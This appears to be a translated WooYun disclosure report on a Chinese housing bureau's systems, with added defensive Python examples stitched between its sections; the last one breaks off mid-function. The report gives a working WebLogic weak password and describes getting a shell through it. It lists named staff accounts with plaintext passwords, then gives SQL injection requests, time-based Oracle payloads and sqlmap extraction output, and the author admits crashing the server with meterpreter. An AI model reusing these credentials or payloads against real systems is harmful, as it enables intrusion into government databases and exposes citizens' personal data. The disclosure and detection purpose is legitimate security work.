
Vulnerability summary

Defect ID: wooyun-2015-0145954

Title: Pingdingshan Housing Administration Bureau: weak passwords on multiple systems plus SQL injection endanger citizens' personal data (shell obtained; database holds several hundred tables)

Affected vendor: 平顶山市房管局 (Pingdingshan Housing Administration Bureau)

Author: 默之

Submitted: 2015-10-11 14:02

Fixed: 2015-11-30 08:56

Published: 2015-11-30 08:56

Vulnerability type: application misconfiguration

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-11: details sent to the vendor, awaiting vendor handling
2015-10-16: vendor confirmed; details disclosed to the vendor only
2015-10-26: details disclosed to core white hats and experts in the relevant field
2015-11-05: details disclosed to regular white hats
2015-11-15: details disclosed to intern white hats
2015-11-30: details disclosed to the public

Brief description:

A weak password caused this; is that my fault?

Detailed description:

# 1 Weak password on the Pingdingshan housing safety survey system
http://**.**.**.**/console/login/LoginForm.jsp
WebLogic weak password
weblogic/weblogic123 (it should be this; I will explain below)
Then deployed a WAR package and got a shell
http://**.**.**.**/test/da.jsp
Had a look at the local database backup files; they are quite large, and this is probably not the only place, but I did not dig further

Screenshot: 数据.png


Then I found the database configuration file

<property name="url" value="jdbc:oracle:thin:@localhost:1521/orcl"></property>
<property name="username" value="****"></property>
<property name="password" value="****"></property>


After connecting, it turned out to be a very large database; the page almost froze once it finished loading. Rough estimate: several hundred tables, including tables holding large amounts of user data

Screenshot: 数百个表.png


Then I found a large number of log files; looking inside, they actually record administrators' accounts and plaintext passwords

Screenshot: log1.png


Screenshot: log+密码.png


Tried logging in and found the admin password had been changed; fine, so I looked through the recent login logs and obtained several accounts

userName=[邬源渊] password=[000000]
userName=[张广和] password=[000000]
userName=[胡筱华] password=[000000]
userName=[田爱青] password=[000000]
userName=[杜凯歌] password=[000000]
userName=[李赛] password=[000000]
userName=[马逢源] password=[000000]


Logged in, and it works

Screenshot: 登陆.png


One important note: I am very sorry for bringing your server down; it was unintentional, my sincere apologies!
What happened is this: I was using metasploit to generate a meterpreter, and I don't know whether the machine is allergic to that kind of executable or what, but it went down immediately.
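The log files described above record account names and plaintext passwords in the form userName=[...] password=[...], which is what let the author recover working accounts after the admin password was changed. The following is an added example, not code from the report or from the affected systems, of the two things a defender wants here: a scan that finds lines still carrying a credential, and a redaction filter that masks the value before the line reaches disk. The key list and the sample log lines are constructed for this example (the names are fictitious); the key list should be adjusted to the application's own field names.

```python
import re

# Password-like keys to redact; constructed list for this example.
CREDENTIAL_KEYS = ("password", "passwd", "pwd", "pass")

# Matches key=[value], key=value and key: value, stopping the value at a
# closing bracket, whitespace or '&' (so query strings are handled too).
_CRED_RE = re.compile(
    r"(?P<key>\b(?:%s)\b\s*[=:]\s*)(?P<open>\[?)(?P<value>[^\]\s&]*)(?P<close>\]?)"
    % "|".join(CREDENTIAL_KEYS),
    re.IGNORECASE,
)


def redact_credentials(line: str) -> str:
    """Replace the value of any password-like field with a fixed mask."""
    return _CRED_RE.sub(
        lambda m: f"{m.group('key')}{m.group('open')}***{m.group('close')}", line
    )


def find_plaintext_credentials(lines):
    """Return (line_number, redacted_line) for every line that carried a credential.

    The redacted copy is returned so that a finding can itself be reported
    without reproducing the secret it is complaining about.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        if _CRED_RE.search(line):
            hits.append((n, redact_credentials(line)))
    return hits


# Constructed sample in the same shape as the lines quoted in the report.
SAMPLE_LOG = [
    "2015-10-10 09:12:01 INFO  login ok userName=[张三] password=[000000]",
    "2015-10-10 09:12:05 INFO  session created for userName=[张三]",
    "2015-10-10 09:13:40 WARN  login failed userName=[李四] password=[123456]",
]

if __name__ == "__main__":
    for n, redacted in find_plaintext_credentials(SAMPLE_LOG):
        print(f"line {n}: {redacted}")
```

The filter belongs in the logging layer itself (a log4j/logback pattern converter or an appender filter in a WebLogic-hosted Java application) so that credentials never reach the file; the scan is for auditing the backlog of logs that already exist, which on these systems must also be treated as a credential leak and the affected passwords rotated.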

Proof of vulnerability:

# 2 Two SQL injections in another system
1. http://**.**.**.**:8080/PUBLIC/YSB/XGMM.aspx

Screenshot: 截图20151011103100.png


Screenshot: 截图20151011103109.png


When the account field is changed to 'or'1'='1 a different dialog pops up, which confirms the injection

Screenshot: 截图20151011103127.png


POST /PUBLIC/YSB/XGMM.aspx HTTP/1.1
Host: **.**.**.**:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8080/PUBLIC/YSB/XGMM.aspx
Cookie: checkcode=YmWtacHLtTY=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
__VIEWSTATE=%2FwEPDwUKLTM2MTk4Mzg4MGRkXd7zUQmHCPu6l6JusZVXeF5msXskuWU21YwE84VDTdU%3D&__VIEWSTATEGENERATOR=B30D5827&txtXM=&txtSFZH=%27or%271%27%3D%271*&txtCheckCode=5053&btnOK=%E7%A1%AE%E5%AE%9A&hfSQBH=&hfInfoCode=&hfFamilyCode=&hfDJS=&hfSQ=&hfJD=&hdDir1=..%2F..%2F


The txtSFZH parameter is injectable: Oracle blind injection

Screenshot: house1注入.png


[09:29:03] [INFO] parsing HTTP request from 'pingdingshan.txt'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] y
[09:29:04] [INFO] resuming back-end DBMS 'oracle'
[09:29:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) POST
Parameter: #2*
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTM2MTk4Mzg4MGRkXd7zUQmHCPu6l6JusZVXeF5msXskuWU
21YwE84VDTdU%3D&__VIEWSTATEGENERATOR=B30D5827&txtXM='or'1'%3D'1&txtSFZH='or'1'%3
D'1' AND 7125=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(118)||CHR(86)||CHR(113),5)
AND 'eXIv'='eXIv&txtCheckCode=5053&btnOK=%E7%A1%AE%E5%AE%9A&hfSQBH=&hfInfoCode=&
hfFamilyCode=&hfDJS=&hfSQ=&hfJD=&hdDir1=../../
---
[09:29:04] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[09:29:04] [INFO] fetching tables for database: 'HISZFBZ'
[09:29:04] [INFO] fetching number of tables for database 'HISZFBZ'
[09:29:04] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:29:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[09:29:22] [INFO] adjusting time delay to 1 second due to good response times
[09:29:24] [ERROR] invalid character detected. retrying..
[09:29:24] [WARNING] increasing time delay to 2 seconds
56
[09:29:39] [INFO] retrieved: BD
[09:30:02] [ERROR] invalid character detected. retrying..
[09:30:02] [WARNING] increasing time delay to 3 seconds
DZ_F
[09:31:09] [ERROR] invalid character detected. retrying..
[09:31:09] [WARNING] increasing time delay to 4 seconds
UNCT
[09:32:28] [ERROR] invalid character detected. retrying..
[09:32:28] [WARNING] increasing time delay to 5 seconds
[09:32:41] [ERROR] invalid character detected. retrying..
[09:32:41] [WARNING] increasing time delay to 6 seconds
IONS
[09:34:32] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
!
[09:34:42] [INFO] retrieved:
[09:34:58] [ERROR] unable to properly validate last character value ('I')..
IEMS_COMPAN
[09:36:04] [ERROR] invalid character detected. retrying..
[09:36:04] [WARNING] increasing time delay to 2 seconds
Y
[09:36:15] [INFO] retrieved: HEMS_CO
[09:37:28] [ERROR] invalid character detected. retrying..
[09:37:28] [WARNING] increasing time delay to 3 seconds
MPAN
[09:38:33] [ERROR] invalid character detected. retrying..
[09:38:33] [WARNING] increasing time delay to 4 seconds
Y
[09:39:14] [ERROR] invalid character detected. retrying..
[09:39:14] [WARNING] increasing time delay to 5 seconds
[09:39:46] [ERROR] invalid character detected. retrying..
[09:39:46] [WARNING] increasing time delay to 6 seconds
_CL
[09:41:15] [ERROR] unable to properly validate last character value ('C')..
C
[09:41:21] [ERROR] invalid character detected. retrying..
[09:41:21] [WARNING] increasing time delay to 2 seconds
SS
[09:41:41] [INFO] retrieved: BDDZ_CONTROL
[09:43:44] [INFO] retrieved: BDDZ_FORM+
[09:44:40] [INFO] retrieved: HE
[09:45:05] [ERROR] invalid character detected. retrying..
[09:45:05] [WARNING] increasing time delay to 3 seconds
MS_COM
[09:46:39] [ERROR] invalid character detected. retrying..
[09:46:39] [WARNING] increasing time delay to 4 seconds
[09:47:01] [ERROR] invalid character detected. retrying..
[09:47:01] [WARNING] increasing time delay to 5 seconds
PANY_YW A
[09:49:35] [INFO] retrieved: HEMS_PE
[09:51:00] [ERROR] invalid character detected. retrying..
[09:51:00] [WARNING] increasing time delay to 6 seconds
RSON
[09:52:46] [INFO] retrieved: HEMS_PERSON_Y
[09:55:20] [ERROR] unable to properly validate last character value ('X')..
X
[09:55:23] [INFO] retrieved: HIMS_B
[09:55:59] [ERROR] invalid character detected. retrying..
[09:55:59] [WARNING] increasing time delay to 2 seconds
TFFMX
[09:56:52] [INFO] retrieved: HIMS_BTFFMK_
[09:57:43] [ERROR] invalid character detected. retrying..
[09:57:43] [WARNING] increasing time delay to 3 seconds
YW
[09:58:13] [ERROR] invalid character detected. retrying..
[09:58:13] [WARNING] increasing time delay to 4 seconds
[09:58:16] [INFO] retrieved: HIMS_BTS
[09:59:16] [ERROR] invalid character detected. retrying..
[09:59:16] [WARNING] increasing time delay to 5 seconds
Q_YW A
[10:00:48] [INFO] retrieved: HIMS_BU
[10:01:50] [ERROR] invalid character detected. retrying..
[10:01:50] [WARNING] increasing time delay to 6 seconds
[10:02:05] [ERROR] unable to properly validate last character value ('a')..
aLD
[10:02:21] [INFO] retrieved: HIMS_C
[10:02:39] [ERROR] invalid character detected. retrying..
[10:02:39] [WARNING] increasing time delay to 2 seconds
OM
[10:03:06] [ERROR] invalid character detected. retrying..
[10:03:06] [WARNING] increasing time delay to 3 seconds
P
[10:03:32] [ERROR] invalid character detected. retrying..
[10:03:32] [WARNING] increasing time delay to 4 seconds
[10:03:47] [ERROR] invalid character detected. retrying..
[10:03:47] [WARNING] increasing time delay to 5 seconds
[10:04:00] [ERROR] invalid character detected. retrying..
[10:04:00] [WARNING] increasing time delay to 6 seconds
[10:04:21] [ERROR] unable to properly validate last character value ('M')..
MAINTS
[10:04:53] [INFO] retrieved: HIMS_FA
[10:05:16] [ERROR] invalid character detected. retrying..
[10:05:16] [WARNING] increasing time delay to 2 seconds
[10:05:23] [ERROR] invalid character detected. retrying..
[10:05:23] [WARNING] increasing time delay to 3 seconds
MILY
[10:06:13] [INFO] retrieved: HIMS_FAMILYFILES
[10:07:48] [INFO] retrieved: HIMS_FAMILYFY
[10:08:39] [INFO] retrieved:
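The sqlmap session above shows what this attack looks like from the server side: the txtSFZH field carries a quote/OR tautology, and each later request adds an Oracle DBMS_PIPE.RECEIVE_MESSAGE(...) call whose only purpose is to delay the response. Both are cheap to detect in the request body. The following is an added example, not code from the report or the affected application, of a signature scan over url-encoded POST bodies; the signatures, the record shape (client, path, body) and the three sample bodies are constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Signatures for the two techniques visible in the sqlmap output: a
# quote/OR tautology ('or'1'='1) and the Oracle delay primitives used for
# time-based blind injection. Constructed for this example.
SIGNATURES = {
    "tautology": re.compile(r"'\s*or\s*'([^']*)'\s*=\s*'\1", re.IGNORECASE),
    "oracle_time_delay": re.compile(
        r"\bDBMS_(?:PIPE\.RECEIVE_MESSAGE|LOCK\.SLEEP)\s*\(", re.IGNORECASE
    ),
}


def scan_form_body(body: str) -> dict:
    """Decode a urlencoded POST body; return {parameter: [matched rule names]}.

    parse_qs undoes the %27/%3D encoding seen in the captured request, so the
    patterns are written against the decoded text the database would see.
    """
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            rules = [rule for rule, rx in SIGNATURES.items() if rx.search(value)]
            if rules:
                findings.setdefault(name, []).extend(rules)
    return findings


def scan_requests(records):
    """Run scan_form_body over (client, path, body) records; return alert dicts."""
    alerts = []
    for client, path, body in records:
        findings = scan_form_body(body)
        if findings:
            alerts.append({"client": client, "path": path, "findings": findings})
    return alerts


# Constructed sample bodies: a normal submission, the tautology probe, and a
# time-based payload in the shape sqlmap reported (fake client address/ID).
BENIGN_BODY = "txtXM=&txtSFZH=000000000000000001&txtCheckCode=5053"
TAUTOLOGY_BODY = "txtXM=&txtSFZH=%27or%271%27%3D%271&txtCheckCode=5053"
TIME_BLIND_BODY = (
    "txtXM=&txtSFZH=%27or%271%27%3D%271%27+AND+7125%3DDBMS_PIPE.RECEIVE_MESSAGE"
    "%28CHR%2870%29%2C5%29+AND+%27a%27%3D%27a&txtCheckCode=5053"
)
SAMPLE_REQUESTS = [
    ("192.0.2.10", "/PUBLIC/YSB/XGMM.aspx", BENIGN_BODY),
    ("192.0.2.77", "/PUBLIC/YSB/XGMM.aspx", TAUTOLOGY_BODY),
    ("192.0.2.77", "/PUBLIC/YSB/XGMM.aspx", TIME_BLIND_BODY),
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(alert)
```

Two caveats for deployment: a plain IIS W3C access log does not record POST bodies, so this scan needs input from a WAF, a reverse proxy, or request logging inside the ASP.NET application; and time-based blind injection is also visible without any signature, as a client whose responses to one endpoint step up in latency by whole seconds, exactly the "increasing time delay to N seconds" progression in the output above.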


2. http://**.**.**.**/public/demo/SQMore.aspx?work=0&type=0
Submitting 'or'1'='1 returns different data

Screenshot: 没有.png


Screenshot: or1=1.png


POST /public/demo/SQMore.aspx?work=0&type=0 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/public/demo/SQMore.aspx?work=0&type=0
Cookie: checkcode=apk7jzVhJXA=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 7336
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwMDgxNDc0MDIPZBYCAgMPZBYGAgMPFgIeCWlubmVyaHRtbAU1PGEgaHJlZj0nZGVtby5hc3B4Jz7pppbpobU8L2E%2BPj7lu4nnp5%2FmiL%2FnlLPor7fmn6Xor6JkAhcPFgIfAAWrJTx1bD48dGFibGUgYm9yZGVyPScwJyBjZWxsc3BhY2luZz0nMCcgY2VsbHBhZGRpbmc9JzAnIHdpZHRoPScxMDAlJz48dGFibGUgYWxpZ249J2NlbnRlcicgYm9yZGVyPScwJyBjZWxsc3BhY2luZz0nMCcgY2VsbHBhZGRpbmc9JzAnIHdpZHRoPSc2MCUnPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeeUn%2BengOmYgSZpZD0wMUE0OTVBNUVEMUE0MzIwQTEyNTUyMkYxNDlBN0QxMic%2B55Sf56eA6ZiBXzQxMDQqKioqKioqKioqKioqKl%2FmlrDljY7ljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wOC0yNSk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95ber6LS15Y2OJmlkPTM4ODhDMTRDRUY2MjQ3NTk4MzI2MDlDRkNDQzY4MUY5Jz7lt6votLXljY5fNDEwNCoqKioqKioqKioqKioqX%2BWNq%2BS4nOWMul%2Fml6A8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA4LTIxKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3lsrPmmKXkuL0maWQ9REFFQzQyOEJFQTYwNDM0QkEzRTVEMDNFNjIzQzNERTcnPuWys%2BaYpeS4vV80MTA0KioqKioqKioqKioqKipf5paw5Y2O5Yy6X%2BaXoDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDgtMTgpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeiMg%2Bi%2FnuWGmyZpZD04RjQ3OTQwRjZBNDM0OEY4OTdFMkNBQjA4REU0NzVEMic%2B6IyD6L%2Be5YabXzQxMDQqKioqKioqKioqKioqKl%2FmlrDljY7ljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wOC0xNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95a2Z5LuY5LymJmlkPUI4MEM2REM4ODdDMjQyRjg5Qjg5NjdBQTZGQjdFODUwJz7lrZnku5jkvKZfNDEwNCoqKioqKioqKioqKioqX%2Ba5m%2Bays%2BWMul%2FlubPpobblsbHlubPov5Dmsb3ovabov5DovpPmnInpmZDlhazlj7g8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA4LTAzKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaH
JlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3mnY7np4Dmnp0maWQ9MzdGMDY1RjU4NzU1NDgzMkI2NzI2NDk4QUE2NzUxRTgnPuadjuengOaenV80MTA0KioqKioqKioqKioqKipf5rmb5rKz5Yy6X%2BaXoOW3peS9nOWNleS9je%2B8jOacquS6pOekvuS%2FnTwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMzApPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPem7hOWHryZpZD0yN0VDRTNFNjQxQ0I0RTZBODE1MURCMjlEMzMwOURFMCc%2B6buE5YevXzQxMDQqKioqKioqKioqKioqKl%2FmuZvmsrPljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0zMCk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95LmU6I%2BK6aaZJmlkPTUyNTE0MENCNkU3NDRBNTJCNzY1N0VEMDU5OEE0MjhBJz7kuZToj4rppplfNDEwNCoqKioqKioqKioqKioqX%2BaWsOWNjuWMul%2Fml6A8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTMwKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3nmb3lqJwmaWQ9QzIyOEM2QzlEMjJFNDQ2MTlBRkY0QjNEOURERDg2NEEnPueZveWonF80MTA0KioqKioqKioqKioqKipf5rmb5rKz5Yy6X%2BaXoDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMjQpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeW8oOiJs%2BiKsyZpZD1ENEM4NEJCNDU1Qjg0M0ZFOTJGQTVBOTUxMENFQzM5MSc%2B5byg6Imz6IqzXzQxMDQqKioqKioqKioqKioqKl%2FljavkuJzljLpf5bmz6aG25bGx5ZWG5Zy6PC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0yMyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU95YiY5bGx5oiQJmlkPTJFOURDODIxOERDNjQyQ0FBNjJFMUI3RDVGQTZEQjAwJz7liJjlsbHmiJBfNDEwNCoqKioqKioqKioqKioqX%2BWNq%2BS4nOWMul%2FluILmoIflh4bku7bljoI8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTIxKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3otbXojonmlY8maWQ9RkNFODJBNTkyMkRFNEQyNjhFNkRFOEJBOTNFQzlFMTInPui1teiOieaVj180MTExKioq
KioqKioqKioqKipf5paw5Y2O5Yy6X%2BaXoDwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMjApPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeW8oOW5s%2BWuiSZpZD1BRjBEMzI2RjJFMzc0NzU0QjA3NDE0RkRCOEZGMTQ3Nyc%2B5byg5bmz5a6JXzQxMDQqKioqKioqKioqKioqKl%2FljavkuJzljLpf5pegPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0xNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU96IuP6ICQ6aOOJmlkPUEzQUZFOUU0QzZGQzQ0NTI5NjFDMEIzMUMzNEYzRDU0Jz7oi4%2FogJDpo45fNDEwNCoqKioqKioqKioqKioqX%2Ba5m%2Bays%2BWMul%2FmlrDljY7ljLrlirPkv53lsYDpgIDkvJE8L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTEzKTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3liJjnjonmooUmaWQ9NzQ0RTIxNzRCQTcwNDRDM0JBQjRCRkQ5Q0VGQkVDNkMnPuWImOeOieaihV80MTA0KioqKioqKioqKioqKipf5paw5Y2O5Yy6XzwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMTEpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeadjuWQjOWWnCZpZD03MTYxREJCMjZFN0Y0MjJDODdGOTY1MkU4RTU1NDEwMSc%2B5p2O5ZCM5ZacXzQxMjMqKioqKioqKioqKioqKl%2FmuZvmsrPljLpf5peg77yI5Liq5Lq65pyq57y057qz5YW76ICB6YeR77yJPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0wNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU96K645LukJmlkPTRBRDYwNUE1NEQ3MzQ1NTRCMDk0ODJFNkQ5MzAzMTFFJz7orrjku6RfNDExMCoqKioqKioqKioqKioqX%2Ba5m%2Bays%2BWMul%2Fml6Dlt6XkvZzvvIzml6DkuqTnpL7kv508L2E%2BPHNwYW4gc3R5bGU9J2NvbG9yOmdyYXknPigyMDE1LTA3LTA3KTwvc3Bhbj48L2xpPjwvdGQ%2BPC90cj48dHI%2BPHRkIGFsaWduPSdsZWZ0Jz48bGk%2BPGEgaHJlZj0nRGV0YWlscy5hc3B4P3dvcms9MCZ0eXBlPTAmbmFtZT3mpZrnv6Dlh68maWQ9RDdCNzREMTk5NEYzNEVEQTkyMjI5RDVBQUUwNDIyNzknPualmue%2FoOWHr180MTA0KioqKioqKioqKioqKipf5rmb5rKz5Yy6X%2BW5s%2BmhtuWxseiBmuS6rueCueWbvuaWh%2BiuvuiuoeaciemZkOWFrOWPuDwvYT48c3
BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMDcpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjx0cj48dGQgYWxpZ249J2xlZnQnPjxsaT48YSBocmVmPSdEZXRhaWxzLmFzcHg%2Fd29yaz0wJnR5cGU9MCZuYW1lPeWImOWJjeeoiyZpZD1CQzUyMTU2RDAwMEQ0RDQ5QjlFQkI0NjA4OTI5MUY0RSc%2B5YiY5YmN56iLXzQxMDQqKioqKioqKioqKioqKl%2FmuZvmsrPljLpf5rG96L2m6L%2BQ6L6T5LqM6Zif5LqM5YiG5YWs5Y%2B477yM5b6F5Lia77yM56S%2B5L%2Bd5Y2V5L2N5LqkPC9hPjxzcGFuIHN0eWxlPSdjb2xvcjpncmF5Jz4oMjAxNS0wNy0wNyk8L3NwYW4%2BPC9saT48L3RkPjwvdHI%2BPHRyPjx0ZCBhbGlnbj0nbGVmdCc%2BPGxpPjxhIGhyZWY9J0RldGFpbHMuYXNweD93b3JrPTAmdHlwZT0wJm5hbWU96ZmI5Li95b2xJmlkPTk2MkFGOUMzRDU5OTRGOENBQTA1MTEzRDAzNTQwOERFJz7pmYjkuL3lvbFfNDEwNCoqKioqKioqKioqKioqX%2BWNq%2BS4nOWMul%2FlubPmo4npm4blm6IgIOWGhemAgOiBjOW3pTwvYT48c3BhbiBzdHlsZT0nY29sb3I6Z3JheSc%2BKDIwMTUtMDctMDYpPC9zcGFuPjwvbGk%2BPC90ZD48L3RyPjwvdGFibGU%2BPC90YWJsZT48L3VsPmQCGQ9kFgoCAQ8PFgIeBFRleHQFBDEzMjlkZAIDDw8WAh8BBQExZGQCBQ8PFgIeB0VuYWJsZWRoZGQCBw8PFgIfAmhkZAIRDw8WAh8BBQI2N2RkZMLonD%2FuJd4ByUsn%2BgOtdumh2ow6uofNDrMHg9iZkyb2&__VIEWSTATEGENERATOR=109A0000&__EVENTVALIDATION=%2FwEWDQLizfLDCAKj%2B%2Br3AwLXp9SJDQKmlKHVCgL6xpitCQKEidv8CQLvjry%2FBQKtkuWiCgKkwZD6AQKgwYz6AgKSvKKuBQL32Zn5DwKEssiCCqahIal94iGAVt9ybQltG9mr7MR0RXj3NGtTxLfjdvcI&txtXM=&txtZJHM=%27or%271%27%3D%271*&txtSQLocation=&txtSQFromTime=&txtSQToTime=&btnQuery=%E6%9F%A5%E8%AF%A2&PNSQMore%24txtNewPageIndex=1&hidWhere=


Again it is the txtZJHM parameter that has the problem; I suggest checking this parameter carefully

Screenshot: house注入.png

Fix recommendations:

1. Change the weak passwords
2. Review and fix the txtZJHM parameter
3. Finally, once again, my apologies.
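Both injections (txtSFZH in XGMM.aspx and txtZJHM in SQMore.aspx) and fix item 2 come down to the same defect: the ID-number field is pasted into the SQL text, so 'or'1'='1 turns a one-row lookup into a match-everything query. The following is an added example, not code from the report or the affected application, showing the concatenated lookup next to its bind-variable form and a format check that rejects such input before any query runs. sqlite3 stands in for the Oracle back end (the :name bind syntax is the same shape Oracle uses), and the applicants table and its rows are constructed for this example.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the Oracle schema; constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE applicants (name TEXT, sfzh TEXT)")
    conn.executemany(
        "INSERT INTO applicants VALUES (?, ?)",
        [("张三", "000000000000000001"),
         ("李四", "000000000000000002"),
         ("王五", "000000000000000003")],
    )
    return conn


def lookup_vulnerable(conn, sfzh: str) -> list:
    """String concatenation: the submitted value becomes part of the SQL text.

    With sfzh = 'or'1'='1 the statement becomes
    ... WHERE sfzh = ''or'1'='1'  and matches every row.
    """
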